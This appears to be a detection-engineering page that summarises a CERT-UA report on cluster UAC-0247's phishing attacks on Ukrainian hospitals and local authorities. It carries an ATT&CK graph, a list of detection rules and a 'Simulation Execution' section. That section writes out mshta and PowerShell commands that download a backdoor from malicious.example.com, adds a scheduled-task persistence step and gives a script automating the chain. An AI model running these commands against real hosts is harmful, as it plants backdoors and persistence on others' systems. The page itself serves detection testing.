Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Between March and April 2026, CERT-UA recorded a rise in cyberattacks against Ukrainian hospitals, municipal authorities, and FPV operator groups. The activity relies on phishing emails containing malicious HTA or HTML links that deliver custom loaders, the RAVENSHELL reverse shell, and the C#-based AGINGFLY remote access tool. Additional payloads include the SILENTLOOP PowerShell backdoor, the CHROMELEVATOR and ZAPIXDESK credential stealers, and the publicly available scanner RUSTSCAN. The attackers also use DLL sideloading, scheduled tasks, and a broad set of custom command-and-control infrastructure.
Investigation
CERT-UA reviewed dozens of incidents and extracted indicators of compromise, including malicious executables, scripts, scheduled tasks, IP addresses, and domains. The investigation uncovered a two-stage loader, a reverse TCP shell protected with XOR encryption, and a WebSocket-based C2 channel that relies on a static AES-CBC key. Analysts also documented the abuse of legitimate Windows utilities such as mshta.exe, powershell.exe, and wscript.exe to launch the malicious HTA files.
Mitigation
The report advises disabling the execution of LNK, HTA, and JavaScript files delivered through email, limiting the use of mshta.exe, powershell.exe, and wscript.exe, and enforcing application allow-listing. Defenders are also encouraged to monitor for suspicious scheduled task creation and outbound connections to the identified command-and-control servers.
Response
Security teams should promptly block the known malicious URLs and IP addresses, hunt for the listed file names and scheduled tasks across endpoints, and isolate compromised systems. Detection rules should be deployed for the observed command lines, with additional monitoring for AGINGFLY-related WebSocket traffic. Any accounts that may have been exposed should undergo immediate credential resets.
"graph TB %% Class definitions classDef technique fill:#ffcc99 classDef tool fill:#c2c2f0 classDef malware fill:#ff9999 %% Node definitions initial_user_exec["<b>Technique</b> – <b>T1204.001 User Execution: Malicious Link</b><br/><b>Description</b>: User clicks a malicious link that triggers payload execution."] class initial_user_exec technique system_binary_mshta["<b>Technique</b> – <b>T1218.005 System Binary Proxy Execution: Mshta</b><br/><b>Description</b>: Use of mshta.exe to execute malicious code."] class system_binary_mshta technique powershell_interpreter["<b>Technique</b> – <b>T1059.001 PowerShell</b><br/><b>Description</b>: PowerShell used for command and scripting execution."] class powershell_interpreter technique compression_obfusc["<b>Technique</b> – <b>T1027.015 Compression</b><br/><b>Description</b>: Compress files to hide malicious content."] class compression_obfusc technique process_hollowing["<b>Technique</b> – <b>T1055.012 Process Injection: Process Hollowing</b><br/><b>Description</b>: Replace code of a running process with malicious code."] class process_hollowing technique dll_sideload["<b>Technique</b> – <b>T1574.001 DLL Sideu2011loading</b><br/><b>Description</b>: Load malicious DLLs via sideu2011loading."] class dll_sideload technique appinit_dll["<b>Technique</b> – <b>T1546.010 AppInit DLLs</b><br/><b>Description</b>: Register malicious DLLs in AppInit_DLLs key for execution."] class appinit_dll technique agingfly_tool["<b>Tool</b> – <b>Name</b>: AGINGFLY<br/><b>Type</b>: Remote Access Tool"] class agingfly_tool tool websocket_c2["<b>Technique</b> – <b>T1071.001 WebSocket C2</b><br/><b>Description</b>: Use WebSocket protocol for command and control communications."] class websocket_c2 technique xmrig_malware["<b>Malware</b> – <b>Name</b>: XMRIG<br/><b>Purpose</b>: Cryptocurrency mining (compute hijacking)"] class xmrig_malware malware rustscan_tool["<b>Tool</b> – <b>Name</b>: Rustscan<br/><b>Function</b>: Network service discovery"] class rustscan_tool tool lateral_transfer["<b>Technique</b> – <b>T1570 Lateral Tool Transfer</b><br/><b>Description</b>: Transfer tools to remote systems for lateral movement."] class lateral_transfer technique ingress_transfer["<b>Technique</b> – <b>T1105 Ingress Tool Transfer</b><br/><b>Description</b>: Transfer tools/files into victim environment."] class ingress_transfer technique chromelevet_tool["<b>Tool</b> – <b>Name</b>: ChromeLevetor<br/><b>Purpose</b>: Extract credentials from Chrome browsers"] class chromelevet_tool tool reflective_obfusc["<b>Technique</b> – <b>T1027 Obfuscated Files or Information</b><br/><b>Description</b>: Use reflective loading and embedded payloads to hide malicious code."] class reflective_obfusc technique scheduled_tasks["<b>Technique</b> – <b>T1059.003 Windows Command Shell (Scheduled Tasks)</b><br/><b>Description</b>: Execute scheduled tasks via cmd shell."] class scheduled_tasks technique %% Connections initial_user_exec –>|leads_to| system_binary_mshta system_binary_mshta –>|executes| powershell_interpreter powershell_interpreter –>|obfuscates| compression_obfusc compression_obfusc –>|injects| process_hollowing process_hollowing –>|loads| dll_sideload dll_sideload –>|triggers| appinit_dll appinit_dll –>|installs| agingfly_tool agingfly_tool –>|communicates via| websocket_c2 websocket_c2 –>|controls| xmrig_malware xmrig_malware –>|discovers network via| rustscan_tool rustscan_tool –>|enables| lateral_transfer lateral_transfer –>|facilitates| ingress_transfer ingress_transfer –>|steals| chromelevet_tool chromelevet_tool –>|enables| reflective_obfusc reflective_obfusc –>|schedules| scheduled_tasks "
Attack Flow
Detections
Possible Malicious LNK File with Double Extension (via cmdline)
View
Powershell Executing File In Suspicious Directory Using Bypass Execution Policy (via cmdline)
View
Download or Upload via Powershell (via cmdline)
View
Possible Execution by Use of Short Script Name (via cmdline)
View
Short File Name (via cmdline)
View
Schtasks Points to Suspicious Directory / Binary / Script (via cmdline)
View
OneDrive Binary Executed From Unusual Directory (via process_creation)
View
Unusual Extension of Executable Binary (via process_creation)
View
LOLBAS WScript / CScript (via process_creation)
View
Suspicious LOLBAS MSHTA Defense Evasion Behavior by Detection of Associated Commands (via process_creation)
View
LOLBAS Conhost (via cmdline)
View
Possible Tunneling Tool Usage [Windows] (via cmdline)
View
Suspicious CURL Usage (via cmdline)
View
Possible Scheduled Task Creation (via powershell)
View
Call Suspicious .NET Methods from Powershell (via powershell)
View
Possible Telegram Abuse As Command And Control Channel (via dns_query)
View
Suspicious Process DNS Query Known Abuse Web Services (via network_connection)
View
Suspicious File Download Direct IP (via proxy)
View
Suspicious Command and Control by Request to Out-of-Band Interactions Domain (via dns)
View
Suspicious Command and Control by Unusual Top Level Domain (TLD) DNS Request (via dns)
View
IOCs (HashSha256) to detect: Hospitals, Local Government Bodies and FPV Operators – Focus of Cyber Threat Cluster UAC-0247 Part 4
View
IOCs (HashSha256) to detect: Hospitals, Local Government Bodies and FPV Operators – Focus of Cyber Threat Cluster UAC-0247 Part 3
View
IOCs (HashSha256) to detect: Hospitals, Local Government Bodies and FPV Operators – Focus of Cyber Threat Cluster UAC-0247 Part 2
View
IOCs (HashSha256) to detect: Hospitals, Local Government Bodies and FPV Operators – Focus of Cyber Threat Cluster UAC-0247 Part 1
View
IOCs (HashSha1) to detect: Hospitals, Local Government Bodies and FPV Operators – Focus of Cyber Threat Cluster UAC-0247
View
IOCs (HashMd5) to detect: Hospitals, Local Government Bodies and FPV Operators – Focus of Cyber Threat Cluster UAC-0247 Part 4
View
IOCs (HashMd5) to detect: Hospitals, Local Government Bodies and FPV Operators – Focus of Cyber Threat Cluster UAC-0247 Part 3
View
IOCs (HashMd5) to detect: Hospitals, Local Government Bodies and FPV Operators – Focus of Cyber Threat Cluster UAC-0247 Part 2
View
IOCs (HashMd5) to detect: Hospitals, Local Government Bodies and FPV Operators – Focus of Cyber Threat Cluster UAC-0247 Part 1
View
IOCs (SourceIP) to detect: Hospitals, Local Government Bodies and FPV Operators – Focus of Cyber Threat Cluster UAC-0247
View
IOCs (DestinationIP) to detect: Hospitals, Local Government Bodies and FPV Operators – Focus of Cyber Threat Cluster UAC-0247
View
Detection of Malicious Domain and C2 Communication by UAC-0247 [Windows Network Connection]
View
Malicious Execution via Mshta and Powershell with Scheduled Tasks [Windows Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
An attacker has gained initial foothold on a compromised workstation. To maintain persistence and execute further payloads while evading traditional AV, the attacker:
- Uses
mshta.exeto download and execute a malicious HTA file that contains a PowerShell one‑liner. - The PowerShell one‑liner downloads a back‑door binary from a remote server and stores it in
%TEMP%. - Creates a scheduled task (
schtasks /Create /SC MINUTE /MO 10) that runs the back‑door every ten minutes, ensuring continual execution even after reboot.
The exact commands executed on the compromised host are:
:: Step 1 – mshta download & launch mshta.exe "http://malicious.example.com/payload.hta" :: Step 2 – PowerShell embedded in the HTA (simulated here directly) powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden ^ -Command "(New-Object System.Net.WebClient).DownloadFile('http://malicious.example.com/backdoor.exe',$env:TEMP+'backdoor.exe')" :: Step 3 – Scheduled task for persistence schtasks /Create /SC MINUTE /MO 10 /TN "Updater" /TR "%TEMP%backdoor.exe" - Uses
-
Regression Test Script: The following PowerShell script automates the entire attack chain, reproducing the exact telemetry required for the rule to fire.
#================================================================ # Regression Test – Trigger Sigma Rule for mshta + PowerShell + schtasks #================================================================ # 1. Define URLs and paths (use benign test servers in a lab) $htaUrl = "http://127.0.0.1:8080/payload.hta" $payloadUrl = "http://127.0.0.1:8080/backdoor.exe" $tempPath = "$env:TEMPbackdoor.exe" $taskName = "Updater" # 2. Simulate mshta execution (downloads the HTA – here we just call mshta) Write-Host "[*] Executing mshta.exe" Start-Process -FilePath "mshta.exe" -ArgumentList "`"$htaUrl`"" -NoNewWindow -Wait # 3. Execute PowerShell one‑liner to fetch the backdoor Write-Host "[*] Downloading backdoor via PowerShell" $psCmd = "(New-Object System.Net.WebClient).DownloadFile('$payloadUrl','$tempPath')" Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command `$psCmd`" -NoNewWindow -Wait # 4. Create scheduled task (10‑minute interval) Write-Host "[*] Creating scheduled task for persistence" $schtasksArgs = "/Create /SC MINUTE /MO 10 /TN `"$taskName`" /TR `"$tempPath`" /F" Start-Process -FilePath "schtasks.exe" -ArgumentList $schtasksArgs -NoNewWindow -Wait Write-Host "[+] Attack simulation completed. Check the SIEM for the alert." -
Cleanup Commands: After validation, remove the created artifacts to restore the host to a clean state.
# Delete the scheduled task schtasks /Delete /TN "Updater" /F # Remove the backdoor binary Remove-Item -Path "$env:TEMPbackdoor.exe" -Force # (Optional) Delete any test HTA files if they were saved locally # Remove-Item -Path "$env:TEMPpayload.hta" -Force